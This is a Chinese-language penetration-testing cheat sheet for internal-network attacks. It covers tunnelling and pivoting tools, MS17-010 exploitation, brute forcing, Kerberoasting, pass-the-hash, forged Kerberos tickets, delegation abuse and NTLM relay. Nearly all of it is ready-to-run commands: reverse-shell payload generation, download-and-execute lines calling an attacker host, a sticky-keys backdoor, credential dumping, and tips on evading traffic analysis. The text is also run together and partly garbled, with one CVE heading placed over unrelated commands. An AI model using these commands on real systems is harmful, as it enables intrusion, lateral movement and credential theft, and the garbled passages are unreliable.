>psexec –accepteula @ips.txt –u admin –p pass@123 –c 1.bat#1.bat內容tasklist /v | find “域管理名字”@echo offecho check ip addr config file…if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto endecho read and analysis file…for /F “eol=#” %%i in (ip.txt) do echo %%i &(echo %%i &tasklist /s %%i /u administrator /p pass@123 /v) >>d:\result.txt:endexit
MSF添加路由
# route add 內網網卡ip 子網掩碼 session的id# route list&Meterpreter>run get_local_subnets查看網段信息再添加路由# run autoroute -s內網網卡ip/24# run autoroute -p 查看路由表&Meterpreter>run post/multi/manage/autoroute
MSF管道監聽
在已經獲得meterpreter的機器上配置管道監聽器meterpreter > pivot add -t pipe -l 已控IP -n bgpipe -a x86 -p windows生成>msfvenom -p windows/meterpreter/reverse_named_pipe PIPEHOST=已控IP PIPENAME=bgpipe -f exe -o pipe.exe.
代理
SSH
正向代理
SSH動態轉發,是建立正向加密的socks通道出網靶機編輯后restart ssh服務#vim /etc/ssh/sshd_confAllowTcpForwarding yes 允許TCP轉發GatewayPorts yes 允許遠程主機連接本地轉發的端口TCPKeepAlive yes TCP會話保持存活PasswordAuthentication yes 密碼認證外部攻擊機執行>ssh -C -f -N -g -D 0.0.0.0:12138 root@出網靶機IP -p 22MSF中設置全局代理或使用其他軟件>setg proxies socks5:0.0.0.0:12138即可進行攻擊隔離區機器
反向代理
#vim /etc/ssh/sshd_confAllowTcpForwarding yes 允許TCP轉發GatewayPorts yes 允許遠程主機連接本地轉發的端口TCPKeepAlive yes TCP會話保持存活PasswordAuthentication yes 密碼認證ClientAliveInterval 修改為30-60保持連接ClientAliveCountMax 取消注釋 發送請求沒響應自動斷開次數107是外網攻擊機內網靶機執行:>ssh -p 22 -qngfNTR 12138:127.0.0.1:22 root@192.168.0.107
攻擊機執行>ssh -p 12138 -qngfNTD 12345 root@192.168.0.107
隧道建立,可使用代理軟件配置攻擊機外網IP:12345訪問內網
SSH隧道+rc4雙重加密
生成木馬>msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 rc4password=123456 lport=446 -f exe -o /var/www/html/bind.exeMSF設置>setg proxies socks5:0.0.0.0:12138>use exploit/multi/handler>set payload windows/x64/meterpreter/bind_tcp_rc4>set rc4password 123456>set rhost 10.1.1.97>set lport 446
公網SSH隧道+Local MSF
>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=公網IP LPORT=12138 -f exe –o /var/www/html/1.exeHandler監聽本地IP:12138SSH轉發>ssh -N -R 12138:本地內網IP:12138 root@公網IP
socks4a
#use auxiliary/server/socks4a#set srvhost 0.0.0.0#set srvport 1080#run多層網絡再多配置個端口Win: Proxifier& Sockscap64Linux: proxychains& 瀏覽器&meterpreter > ipconfigIP Address : 10.1.13.3meterpreter > run autoroute -s 10.1.13.0/24meterpreter > run autoroute -p10.1.13.0 255.255.255.0 Session 1meterpreter > bgmsf auxiliary(tcp) > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 10.1.13.2msf exploit(psexec) > exploit
socks5
#use auxiliary/server/socks5#set srvhost 0.0.0.0#set srvport 1080#run瀏覽器
基于web的socks5
reGeorg
https://github.com/sensepost/reGeorg>python reGeorgSocksProxy.py -u http://靶機/tunnel.aspx -l 外網IP -p 10080打開Proxifier,更改為腳本指定的端口10080
或proxychains#vim /etc/proxychains.conf去掉dynamic_chain注釋>添加socks5 127.0.0.1 10080
或MSF>setg proxies socks5:外網IP:10080>setg ReverseAllowProxy true 允許反向代理
Neo-reGeorg
Step 1. 設置密碼生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上傳到WEB服務器$ python3 neoreg.py generate -k password
偽裝頁面$ python3 neoreg.py generate -k <you_password> --file 404.htmlStep 2. 使用 neoreg.py 連接WEB服務器,在本地建立 socks 代理$ python3 neoreg.py -k password -u http://xx/tunnel.php$ python3 neoreg.py -k <you_password> -u <server_url> --skip開啟代理$ python neoreg.py -k <you_password> -l 外網IP -p 10081 -u http://xx/neo-tunnel.aspx
ABPTTS端口轉發
https://github.com/nccgroup/ABPTTS端口轉發>python abpttsfactory.py -o webshell 生成shell./webshell目錄下生成的相應腳本文件傳入目標中>python abpttsclient.py -c webshell/config.txt -u "http://目標網址/trans.aspx" -f 攻擊機IP:12345/目標IP:3389
ABPTTS轉發內網其他機器端口>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389
要轉發多個機器或多個端口>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389 -f 192.168.0.107:33891/10.1.1.101:80 -f 192.168.0.107:33892/10.1.1.102:22SSH代理一級網段需要一臺有權限的Linux靶機>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.108:22>ssh -p 222 -qTfnN -D 0.0.0.0:1081 root@192.168.0.107
配置proxychains即可
SSH代理二級網段需要靶機web權限,一級內網一臺web權限轉發內網web出來傳入abptts的shell>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:8080/10.1.1.108:80>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.107/qq.aspx -f 192.168.0.107:222/10.1.1.106:22SSH連接192.168.0.107:222即可到達二級網絡反彈msfkali生成bind型腳本>msfvenom -p linux/x64/shell_bind_tcp LPORT=12138 -f elf -o shell在二級不出網linux上執行將他的12138端口通過abptts轉出>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:13128/10.1.1.101:12138Msf本地監聽13128即可
Tunna轉發
>python proxy.py -u http://192.168.0.98/tunnel.aspx -l 12138 -r 3389 –v
Earthworm
正向(目標機存在外網IP):
>ew –s ssocksd –l 888連接sockscap64靶機外網IP+端口888
反彈socks5(目標機無外網IP):
外網攻擊機:>ew -s rcsocks -l 1008 -e 888-l為socks軟件連接的端口,-e為目標主機和vps的通信端口����。靶機:>ew -s rssocks -d 外網IP -e 1008sockscap64連接攻擊機外網IP+端口1008
二級環境(A有外網,B內網無外網):
靶機B:>ew –s ssocksd –l 888靶機A:>ew –s lcx_tran –l 1080 –f 靶機B –g 888Sockscap64連接靶機外網IP+端口 1080
二級環境(A無外網,B內網無外網):
外網攻擊機:>ew –s lcx_listen –l 10800 –e 888靶機B:>ew –s ssocksd –l 999靶機A:>ew -s lcx_slave -d 外網 -e 8888 -f 靶機B -g 9999Sockscap64連接攻擊機外網IP+端口 10080
三級環境(A無外網,B內網無外網通A,C通B):
外網攻擊機:>ew -s rcsocks -l 1008 -e 888靶機A:>ew -s lcx_slave -d 外網攻擊機 -e 888 -f 靶機B -g 999靶機B:>ew -s lcx_listen -l 999 -e 777靶機C:>ew -s rssocks -d靶機B -e 777Sockscap64連接攻擊機外網IP+端口 1008
Frp
https://github.com/fatedier/frp/releases/使用條件:目標主機通外網,擁有自己的公網ip對攻擊機外網服務端frps.ini進行配置[common]bind_port=8080靶機客戶端[common]server_addr=服務器端外網IPserver_port=8080[socks5]type=tcpremote_port=12345plugin=socks5use_encryption=trueuse_compression=true以上是啟用加密和壓縮,能躲避流量分析設備�。上傳frpc.exe和frpc.ini到目標服務器上,直接運行frpc.exe(在實戰中可能會提示找不到配置文件,需要使用-c參數指定配置文件的路徑frpc.exe -c 文件路徑),可以修改文件名和配置名以混淆視聽�����。公網vps主機上運行./frps –c frps.ini靶機執行./frpc –c frpc.ini
MSF中設置全局變量>setg proxies 公網IP:12345>setg ReverseAllowProxy true 運行反向代理
結束攻擊tasklisttaskkill /pid 進程號 -t –f
SSF
https://github.com/securesocketfunneling/ssf/releases
正向socks代理
邊界機器執行:>ssfd.exe -p 1080 linux執行:./ssfd -p 1080
攻擊機執行:>ssf.exe -D 12138 -p 1080 192.168.0.98(邊界機器IP)
本機配置proxychain或proxifier
反向socks代理
攻擊機執行:>ssfd.exe -p 1080
內網機器執行:>ssf.exe -F 12138 -p 1080 192.168.0.106(攻擊機IP)
多級級聯
多級內網機執行:>ssfd.exe -p 1080 -c config.jsonJson文件加入字段"circuit": [{"host": "A中繼機IP", "port":"1080"},{"host": "B中繼機IP", "port":"1080"}],所有中繼機執行:>ssfd.exe -p 1080 -c config.json邊界機器執行:>ssf.exe -c config.json -p 1080 多級內網機IP -X 12138邊界機執行:>nc.exe 127.0.0.1 12138即可獲得多級內網機cmdshell
反彈shell
攻擊機執行:>ssfd.exe -p 1080 -c config.json
內網機器執行:
攻擊機執行:>nc 127.0.0.1 12138
Sass
https://github.com/Sass/libQtSass/releases/download/v2.0.2/Sass-libqss-v2.0.2-win64.7z靶機新建配置文件1.json,內容為{"server":"0.0.0.0","server_port":13337,"local_address":"127.0.0.1","local_port":1080,"password":"123456","timeout":300,"method":"aes-256-cfb","fast_open":false,"workers": 1}執行>Sass-libqss.exe -c 1.json –S攻擊機配置
瀏覽器或其他攻擊軟件配置代理127.0.0.1:1080即可(需有http(s)/socks5功能)
Goproxy
https://github.com/snail007/goproxy/releases靶機執行>proxy.exe socks -t tcp -p "0.0.0.0:13337"
攻擊機配置Proxifier
Chisel
https://github.com/jpillora/chisel/releases攻擊機監聽>chisel.exe server -p 12138 --reverse
靶機執行>chisel.exe client 192.168.0.102:12138 R:12345:127.0.0.1:12346
靶機執行>chisel.exe server -p 12346 --socks5
攻擊機執行>chisel.exe client 127.0.0.1:12345 socks
當隧道建立成功時,攻擊機本地會啟動1080端口
即可使用
代理軟件
Sockscap64ProxifierProxychains#vim /etc/proxychains.conf去掉dynamic_chain注釋>添加socks4 127.0.0.1 1080#cp /usr/lib/proxychains3/proxyresolv /usr/bin
Ngrok內網穿透
https://ngrok.com/https://www.ngrok.cc/下載ngrok#ngrok authtoken 授權碼#ngrok http 8080#ngrok tcp 8888
MS17-010
掃描#use auxiliary/scanner/smb/smb_ms17_010#set rhosts 192.168.1.0/24&#nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms17-010.nse 10.11.1.0/20攻擊#use exploit/windows/smb/ms_17_010_eternalblue易藍屏#set payload windows/x64/meterpreter/reverse_tcp#use auxiliary/admin/smb/ms17_010_command#set command REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f
MS08_067
#nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms08-067.nse 10.11.1.0/20#use exploit/windows/smb/ms08_067_netapi#set payload windows/meterpreter/reverse_tcpCVE-2019-0708
攻擊MySQL數據庫
#use auxiliary/scanner/mysql/mysql_version 主機發現#use auxiliary/scanner/mysql/mysql_login MYSQL爆破#use exploit/multi/mysql/mysql_udf_payload UDF提權#use exploit/windows/mysql/mysql_mof MOF提權#use auxiliary/admin/mysql/mysql_sql 執行命令
攻擊MSSQL數據庫
>PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()" 列出域內mssql主機https://github.com/NetSPI/PowerUpSQL>Get-SQLInstanceLocal #發現本機SQLServer實例>Get-SQLInstanceDomain #發現域中的SQLServer實例>Get-SQLInstanceBroadcast #發現工作組SQLServer實例>$Targets = Get-SQLInstanceBroadcast -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"} 工作組mssql爆破>$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"}>Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw –Verbose>$Targets 域內MSSQL爆破Nishang腳本爆破MSSQL>Invoke-BruteForce -ComputerName dc.zone.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose -StopOnSuccess#use auxiliary/scanner/mssql/mssql_login 爆破主機#use auxiliary/admin/mssql/mssql_exec 調用cmd#use auxiliary/admin/mssql/mssql_sql 執行SQL語句#use exploit/windows/mssql/mssql_payload 上線MSSQL主機http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1導入nishang執行MSSQL命令的腳本>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1')>Execute-Command-MSSQL -ComputerName 192.168.0.98 -UserName sa -Password admin 會返回powershell#use auxiliary/scanner/mssql/mssql_hashdump 導出MSSQL密碼已知服務器ntlmhash,未知mssql賬號密碼Hash注入+socks無密碼連接mssql>mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:. /ntlm:{hash} /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exe\"" "exit"將SSMS.exe加入sockscap中啟動命令行版sqltoolhttps://github.com/uknowsec/SharpSQLTools
隔離主機payload
隔離主機一般與攻擊機無雙向路由,payload設置為bind讓靶機監聽����。>set payload windows/meterpreter/bind_tcp>set RHOST 隔離機IP
爆破
Hydra
參數:-l 指定的用戶名 -p 指定密碼-L 用戶名字典 -P 密碼字典-s 指定端口 -o 輸出文件>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql>hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv>hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V>hydra -L /root/user.txt -P pass.txt smb 10.1.1.10 -vV>hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10
Medusa
參數:-h 目標名或IP -H 目標列表-u 用戶名 -U 用戶名字典-p 密碼 -P 密碼字典 -f 爆破成功停止 -M 指定服務 -t 線程-n 指定端口 -e ns 嘗試空密碼和用戶名密碼相同>medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql>medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql
域內爆破
Kerbrute
https://github.com/ropnop/kerbrute用戶枚舉>kerbrute_windows_amd64.exe userenum -d zone.com username.txt
密碼噴射
>kerbrute_windows_amd64.exe passwordspray -d zone.com use.txt password
密碼爆破此項會產生日志>kerbrute_windows_amd64.exe bruteuser -d zone.com pass.txt name
組合爆破格式為username:password>kerbrute_windows_amd64.exe -d zone.com bruteforce com.txt
DomainPasswordSpray
https://github.com/dafthack/DomainPasswordSpray自動收集賬戶進行密碼噴射>Invoke-DomainPasswordSpray -Password pass
組合爆破>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -PasswordList passlist.txt -outfile result.txt會產生日志單密碼>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -Password password
方程式內網不產生session
msfvenom生成一個x64或x86的dll文件,替換該工具下的x64.dll或x86.dllwindows server 2008 ,msfvenom生成x64.dll文件msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x64.dllmsf配置use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lport 12345set lhost 192.168.0.107將該x64.dll替換到方程式利用工具下面���。只需要更換目標的IP,就可以獲取session����。windows server 2003 ,msfvenom生成x86.dll文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x86.dllmsf配置use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lport 12345set lhost 192.168.0.107通過ms17_010_commend模塊執行系統命令添加用戶至管理員�����。再指定SMBPass和SMBUser來建立windows可訪問命名管道
Kerberoasting
https://github.com/nidem/kerberoast
SPN發現
cmd
>setspn -T 域名 -Q */*
Powershell
https://github.com/PyroTek3/PowerShell-AD-Recon
Powerview>Get-NetComputer -SPN termsrv*>Get-NetUser -SPN
>import module GetUserSPNs.ps1
Empire
>usemodule situational_awareness/network/get_spn
申請票據
>Add-Type -AssemblyName System.IdentityModel>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN"&>kerberos::ask /target:SPN
導出票據
mimikatz>kerberos::list /export
破解密碼
>python tgsrepcrack.py word.txt file.kirbihttps://github.com/leechristensen/tgscrack>python extractServiceTicketParts.py file.kirbi>tgscrack.exe -hashfile hash.txt -wordlist word.txt
重寫票據
>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -u 500>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -g 512注入內存�����、>kerberos::ptt new.kirbi
GetUserSPNs
https://github.com/SecureAuthCorp/impacket請求TGS>python GetUserSPNs.py -request -dc-ip 10.1.1.1 zone.com/y破解>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
ASEPRoasting
當用戶關閉了kerberos預身份認證時可以進行攻擊
>Rubeus.exe asreproast /user:y /dc:10.1.1.100 /domain:zone.com
或使用Powerview結合https://github.com/gold1029/ASREPRoast獲取不要求kerberos預身份驗證的域內用戶>Get-DomainUser -PreauthNotRequired -Properties distinguishedname –Verbose
>Get-ASREPHash -UserName y -Domain zone.com -Verbose
破解RC4-HMAC AS-REP>john hash.txt --wordlist=wordlist.txt
PASS-THE-HASH
允許本地管理組所有成員連接>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
WMIExec & TheHash
>powershell -ep bypass>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-WMIExec.ps1'); >IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-TheHash.ps1');>Invoke-TheHash -Type WMIExec -Target 192.168.0.0/24 -Domain zone.com -Username godadmin -Hash f1axxxxxxxxxb771
WMI
>net use \\1.1.1.1\admin$ /user:"administrator" "password">copy windowsupdate.exe \\1.1.1.1\admin$\dir\>wmic /NODE:"1.1.1.1" /user:"administrator" /password:"password" PROCESS call create "c:\windows\dir\windowsupdate.exe">del \\1.1.1.1\admin$\dir\windowsupdate.exe /F>net use \\1.1.1.1\admin$ /del
wmiexec.py
https://github.com/SecureAuthCorp/impacket>python wmiexec.py -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 域名/Administrator@192.168.11.1 "whoami">python wmiexec.py admin@192.168.1.2
wmiexec.vbs
半交互式:>cscript //nologo wmiexec.vbs /shell 192.168.1.2 admin pass單條命令>cscript //nologo wmiexec.vbs /cmd 192.168.1.2 domain\admin pass "whoami"下載執行>wmic /node:192.168.0.115 /user:godadmin /password:password PROCESS call create "cmd /c certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe c:/windows/temp/win.exe & c:/windows/temp/win.exe & certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe delete"
Powershell
>wmic /NODE:192.168.3.108 /user:"godadmin" /password:"password" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/xxx.txt');\""Invoke-WMIExec>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1a5b1a3641bec99ff92fe9df700b771 -Command \"net user admin Qwe@123 /add\" -Verbose"
>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1xxxxxxxxxxxxx771 -Command \"mshta http://192.168.0.107:8080/YAyAPN6odzbAzKn.hta\" -Verbose"
Psexec
>psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09域名/Administrator@192.168.1.1 "whoami">psexec.exe –accepteula \\192.168.1.2 –u admin –p pass cmd.exe 無確認窗Msf#use exploit/windows/smb/psexec#use exploit/windows/smb/psexec_psh(powershell版本)
Mimikatz
Windows XP�、Vista�、2008����、7���、2008 r2 和2012沒有安裝KB2871997補丁的機器上,使用NTLM進行PTHmimikatz # privilege::debugmimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm}執行一個文件mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm} /run:powershell.exeWindows 8.1 ��、2012 R2���、安裝KB2871997的Win 7 ���、2008 R2和2012上可使用AES KEY進行PTH>privilege::debug>sekurlsa::ekeys>sekurlsa::pth /user:administrator /domain:zone.com /aes128:{key}
pth-winexe
>pth-winexe -U godadmin%password --system --ostype=1 //192.168.0.115 cmd
Smbexec
>python smbexec.py administrator@192.168.0.98
PASS-THE-TICKET
名詞
KDC(Key Distribution Center): 密鑰分發中心,里面包含兩個服務:AS和TGSAS(Authentication Server): 身份認證服務TGS(Ticket Granting Server): 票據授予服務TGT(Ticket Granting Ticket): 由身份認證服務授予的票據,用于身份認證,存儲在內存,默認有效期為10小時
黃金票據+Mimikatz
Golden Ticket偽造TGT(Ticket Granting Ticket),可以獲取任何Kerberos服務權限,域控中提取krbtgt的hash域控:dc.zone.com域內機器:sub2k8.zone.com域內普通用戶:y域內機器是不能訪問dc上的文件
清空票據
域控中獲取krbtgt用戶的信息>privilege::debug>mimikatz log "lsadump::dcsync /domain:zone.com /user:krbtgt"獲取信息:/domain�、/sid�、/aes256
在sub2k8中生成golden ticket>mimikatz “kerberos::golden /krbtgt:{ntlmhash} /admin:域管理 /domain:域名 /sid:sid /ticket:gold.kirbi”
導入Mimikatz#kerberos::ptt 123.kirbi
白銀票據+Mimikatz
Silver Ticket是偽造的TGS,只能訪問指定服務權限域控:dc.zone.com域內機器:sub2k8.zone.com域內普通用戶:y域控中導出>privilege::debug>sekurlsa::logonpasswords
Sub2k8偽造票據>mimikatz "kerberos::golden /domain:zone.com /sid:{SID} /target:dc.zone.com /service:cifs /rc4:{NTLM} /user:y /ptt"
MS14-068
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe域控:dc.zone.com/10.1.1.100域內機器:sub2k8.zone.com/10.1.1.98域內普通用戶:y,Sub2k8中清除票據Mimikatz#kerberos::purge>whoami /user查看SID創建ccache票據文件> MS14-068.exe -u y@zone.com -p password -s S-1-5-21-2346829310-1781191092-2540298887-1112 -d dc.zone.com注入票據Mimikatz# Kerberos::ptc c:\xx\xx\xxx.ccachepsexec無密碼登陸>PsExec.exe \\dc.xx.com\ cmd.exe
Mimikatz+MSF
>whoami /user 查看SIDmsf >use auxiliary/admin/kerberos/ms14_068_kerberos_checksummsf >set domain 域名msf >set password 密碼msf >set rhost 域控機器msf >set user 用戶msf >set user_sid sid得到.bin文件#apt-get install krb5-user上傳mimikatz和bin文件Mimikatz# Kerberos::clist “xxxx.bin” /export生成kirbi文件Meterpreter >load kiwiMeterpreter >download c:/wmpub/xxxxxx.kirbi /tmp/注入票據Meterpreter >kerberos_ticket_use /tmp/xxxxxx.kirbi#use exploit/windows/local/current_user_psexec#set TECHNIQUE PSH#set RHOST dc.xx.com#set payload windows/meterpreter/reverse_tcp#set LHOST 192.168.1.1#set session 1#exploit
goldenPac.py
kali下#apt-get install krb5-user#goldenPac.py –dc-ip 10.1.1.100 –target-ip 10.1.1.100 zone.com/y:password@dc.zone.com
賬戶委派
賬戶非受限委派
設置用戶y為服務賬戶(服務賬戶有委派權限)>setspn -U -A variant/golden y
查詢非受限委派域內賬號,使用powerview>Get-NetUser -Unconstrained -Domain zone.com
利用管理員權限打開mimikatz導出TGT>privilege::debug>sekurlsa::tickets /export
清空票據,導入票據
獲得Powershell會話> Enter-PSSession -ComputerName dc.zone.com
賬戶受限委派
查詢受限委派用戶> Get-DomainUser -TrustedToAuth –Domain zone.com
查詢受限委派主機> Get-DomainComputer -TrustedToAuth -Domain zone.com
利用方法后見權限維持模塊
資源受限委派
獲取域管理員>Get-DomainUser|select -First 1域對象信息>Get-DomainObject -Identity 'DC=zone,DC=com'ms-ds-machineaccountquota允許非特權用戶將最多 10 臺計算機連接到域
查看有沒有設置msDS-AllowedToActOnBehalfOfOtherIdentity策略>Get-DomainComputer dc|select name, msDS-AllowedToActOnBehalfOfOtherIdentity
用powermad添加一具備SPN的機器賬戶https://github.com/Kevin-Robertson/Powermad>New-MachineAccount -MachineAccount newcom
或>$pass = ConvertTo-SecureString '123qwe!@#' -AsPlainText –Force>New-MachineAccount –MachineAccount newcom -Password $pass或>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)
獲取添加的機器賬戶的SID
將添加的機器賬戶的SID設置給DC的msDS-AllowedToActOnBehalfOfOtherIdentity參數>$SD=New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2346829310-1781191092-2540298887-1122)"; $SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}設置完成后查看
配置ACL允許訪問>$RawBytes=Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity' |select -expand msds-allowedtoactonbehalfofotheridentity;$Descriptor= New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes,0;$Descriptor.DiscretionaryAcl
此時使用創建的機器賬戶的hash可偽造域管先獲取newcom的NTLM>Rubeus.exe hash /password:123qwe!@# /user:newcom /domain:zone.com
導入票據偽造域管用戶訪問cifs服務>Rubeus.exe s4u /user:newcom$ /rc4:00AFFD88FA323B00D4560B F9FEF0EC2F /impersonateuser:godadmin /msdsspn:cifs/dc.zone.com /ptt
成功獲取到godadmin的tgs
CVE-2019-0708
>python ntlmrelayx.py -t ldaps://dc.zone.com --remove-mic --delegate-access -smb2support>python printerbug.py zone.com/y@win7.zone.com 192.168.0.attack>python getST.py -spn host/win7.zone.com 'zone.com/機器賬戶$:密碼' -impersionate administrator -dc-ip 192.168.0.1>export KRB5CCNAME=XX.ccahe>python secretdump.py -k -no-pass dc.zone.com -just-dc
NTLM中繼
Ntlmrelayx+資源受限委派
域控需啟用ldaps,域機器啟用ipv6*當執行ntlmrelayx腳本時,遇到報錯
修改impacket/impacket/examples/ntlmrelayx/attacks/ldapattack.py ldapattack.py腳本,在510行上方加入if self.config.interactive:
再重新安裝>python setup.py install使用mitm6通過ipv6接管dns服務器,配置好后開始請求網絡的WPAD>mitm6 -i eth1 -d zone.com
使用ntlmreplyx.py監聽>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --add-computer當目標重啟網絡�、訪問瀏覽器����、重啟電腦時會把攻擊機視為代理服務器,當目標通過攻擊機代理服務器訪問網絡時,攻擊機將會向目標發送代理的認證請求,并中繼NTLM認證到LDAP服務器上,完成攻擊�����。這里要使用ldaps,因為域控會拒絕在不安全的連接中創建賬戶����。
可以看到已經成功添加了一個機器賬戶RFAYOVCC密碼6YdX.NXqQGyuR7[使用此機器賬戶申請票據>python getST.py -spn cifs/sub2k8.zone.com zone.com/RFAYOVCC\$ -impersonate y
>export KRB5CCNAME=y.ccache獲取shell>python smbexec.py -no-pass -k sub2k8.zone.com
dumphash����、緩存hash>python secretsdump.py -k -no-pass sub2k8.zone.com
當域控機器未啟用LDAPS,并且已獲得域普通用戶權限時使用powermad創建一個機器賬戶newcomhttps://github.com/Kevin-Robertson/Powermad>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)
或
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$
后續正常操作即可���。內網存在java webdav時PROPPATCH�、PROPFIND���、 LOCK等請求方法接受XML作為輸入時會形成xxe����。攻擊者要求采用NTLM認證方式是,webdav會自動使用當前用戶的憑據認證��。使用ntlmrelayx監聽>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --escalate-user newcom\$Burp發送xxe請求PROPFIND /webdav HTTP/1.1Host: 1.1.1.1<?xml version"1.0" encoding="UFT-8"?><!DOCTYPE xxe [<!ENTITY loot SYSTEM "http://10.1.1.101"> ]><D:xxe xmln:D="DAV:"><D:set><D:prop><a xmlns="http://xx.e">&loot;</a></D:prop></D:set></D:xxe>
Responder
SMB協議截獲
內網中間人攻擊腳本,kali內置監聽網絡接口>responder -I wlan0(eth0)指定某臺機器或網段:修改/etc/responder/Responder.py中RespondTo參數���。網段中有認證行為會捕獲NTLMv2 hash
當訪問一個不存在的共享時修改配置文件來解析Xp修改/usr/share/responder/servers/SMB.py定位到errorcode修改為\x71\x00\x00\xc0,刪除掉/usr/share/responder/Responder.db
XP時使用\\cmd\share形式訪問共享輸入密碼達4次會斷開連接�。定位到
修改self.ntry != 10Win7以上修改/usr/share/responder/servers/SMB.py定位到##Session Setup 3
刪除掉and GrabMessageID(data)[0:1] == "\x02",刪除掉/usr/share/responder/Responder.db修改后可以進行解析,捕獲hash,否則會報錯誤64
強制截取NTLMv1 hash,修改/usr/share/responder/packets.py,定位到以下參數,修改為\x15\x82\x81\xe2,修改Conf文件設置Challenge為16位固定值��。
WPAD代理欺騙
>responder -I eth0 -v -FF參數即可開啟強制WPAD認證服務抓取 hash,訪問IE或重啟電腦即可發送欺騙認證獲得hash��。
重啟也可以抓到
Web漏洞
內網中使用文件包含漏洞和XSS>Responder -I eth0 -vhttp://10.1.1.1/file.php?file=\\10.1.1.12\sharehttp://10.1.1.1/xss.php?article=<img src=\\10.1.1.12\xx>
中繼攻擊
